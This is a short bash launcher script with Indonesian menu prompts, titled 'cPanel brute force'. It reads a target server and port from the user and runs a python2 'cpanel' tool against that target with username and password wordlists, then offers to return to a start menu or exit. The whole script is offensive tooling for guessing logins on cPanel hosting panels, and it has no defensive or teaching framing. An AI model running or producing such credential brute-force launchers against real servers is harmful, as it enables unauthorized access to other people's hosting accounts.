#!/bin/bash

echo "
         \033[32;1m..::[cPanel brute force]::.. /033[0m
"
echo "




"


echo -n "\n\033[33;1mmasukan server di sini: \033[0m"
read trgt
echo "
"
echo -n "\n\033[33;1mmasukan port disini: \033[0m"
read port

cd ../xx

python2 cpanel $trgt $port ../wodlis/usernames.lst ../wodlis/passwords.lst


echo "



"

echo "
=> Tekan \033[33mB\033[0m untuk kembali
=> Tekan \033[31mK\033[0m untuk keluar"
echo -n "=> Pilihan: "
read upil
if [ $upil = b ] || [ $upil = B ]
then
clear
sh start
fi

if [ $upil = k ] || [ $upil = K ]
then
clear
sh exit
fi
